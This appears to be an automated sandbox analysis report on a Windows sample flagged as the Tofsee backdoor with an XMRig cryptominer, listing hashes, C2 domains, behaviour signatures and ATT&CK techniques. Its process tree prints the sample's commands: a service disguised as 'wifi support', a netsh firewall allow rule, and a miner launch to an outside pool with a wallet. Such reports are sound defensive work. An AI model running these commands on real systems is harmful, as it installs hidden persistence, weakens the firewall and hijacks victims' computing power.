Overview

overview

10

Static

static

f3baa4ed45...0f.exe

windows7_x64

10

f3baa4ed45...0f.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    18-10-2021 12:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe

  • Size

    344KB

  • MD5

    f3baa4ed45dc9d0b254f70e6e4b0ac0f

  • SHA1

    b3aa03c4bebf4d65227f54f2cafd1e50daa8aebe

  • SHA256

    16fdbb6f45f722fffffafa455e8c5dd268c895e6b050031f40ab557be5240332

  • SHA512

    13d2af499e0ae5819ced2d9086926dbd73259efa24e64705651899f6f1d730e8ed0b36d3438d4271a9254979f132523a3fb9f0994bb77a2a1d2105618f0bbb4a

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe
    "C:\Users\Admin\AppData\Local\Temp\f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ulycubjm\
      2⤵
        PID:1784
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ujkqdoih.exe" C:\Windows\SysWOW64\ulycubjm\
        2⤵
          PID:1288
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ulycubjm binPath= "C:\Windows\SysWOW64\ulycubjm\ujkqdoih.exe /d\"C:\Users\Admin\AppData\Local\Temp\f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:800
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ulycubjm "wifi internet conection"
            2⤵
              PID:2872
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ulycubjm
              2⤵
                PID:4024
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3908
              • C:\Windows\SysWOW64\ulycubjm\ujkqdoih.exe
                C:\Windows\SysWOW64\ulycubjm\ujkqdoih.exe /d"C:\Users\Admin\AppData\Local\Temp\f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1228
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3624
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2288

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Credential Access

              Discovery

              System Information Discovery

              1
              T1082

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\ujkqdoih.exe
                MD5

                f01c561073129227a8ea37d0d22941d9

                SHA1

                ee34637aba8f21cd9c23129c891f0fb658e729df

                SHA256

                27c92c2a4371efb7dba1f0c8e6dd97d361b99708d95836db69002db15343c1b5

                SHA512

                64497e3bad29c298f9fd12cf73656705152cdb462986b899de738d1b50fb14e10d870f8b9ff7f1a48f9ba7eae3d6318556c6af3956e2dd226dccad0c36e84ffa

                Download Submit
              • C:\Windows\SysWOW64\ulycubjm\ujkqdoih.exe
                MD5

                f01c561073129227a8ea37d0d22941d9

                SHA1

                ee34637aba8f21cd9c23129c891f0fb658e729df

                SHA256

                27c92c2a4371efb7dba1f0c8e6dd97d361b99708d95836db69002db15343c1b5

                SHA512

                64497e3bad29c298f9fd12cf73656705152cdb462986b899de738d1b50fb14e10d870f8b9ff7f1a48f9ba7eae3d6318556c6af3956e2dd226dccad0c36e84ffa

                Download Submit
              • memory/800-121-0x0000000000000000-mapping.dmp
                Download
              • memory/1228-126-0x0000000000A81000-0x0000000000A91000-memory.dmp
                Filesize

                64KB

                Download
              • memory/1228-132-0x0000000000400000-0x0000000000788000-memory.dmp
                Filesize

                3.5MB

                Download
              • memory/1228-131-0x0000000000790000-0x00000000008DA000-memory.dmp
                Filesize

                1.3MB

                Download
              • memory/1288-119-0x0000000000000000-mapping.dmp
                Download
              • memory/1500-117-0x0000000000400000-0x0000000000788000-memory.dmp
                Filesize

                3.5MB

                Download
              • memory/1500-116-0x00000000001E0000-0x00000000001F3000-memory.dmp
                Filesize

                76KB

                Download
              • memory/1784-118-0x0000000000000000-mapping.dmp
                Download
              • memory/2288-138-0x0000000000C40000-0x0000000000D31000-memory.dmp
                Filesize

                964KB

                Download
              • memory/2288-137-0x0000000000CD259C-mapping.dmp
                Download
              • memory/2288-133-0x0000000000C40000-0x0000000000D31000-memory.dmp
                Filesize

                964KB

                Download
              • memory/2872-122-0x0000000000000000-mapping.dmp
                Download
              • memory/3624-128-0x0000000000A39A6B-mapping.dmp
                Download
              • memory/3624-130-0x0000000000740000-0x0000000000741000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3624-129-0x0000000000740000-0x0000000000741000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3624-127-0x0000000000A30000-0x0000000000A45000-memory.dmp
                Filesize

                84KB

                Download
              • memory/3908-124-0x0000000000000000-mapping.dmp
                Download
              • memory/4024-123-0x0000000000000000-mapping.dmp
                Download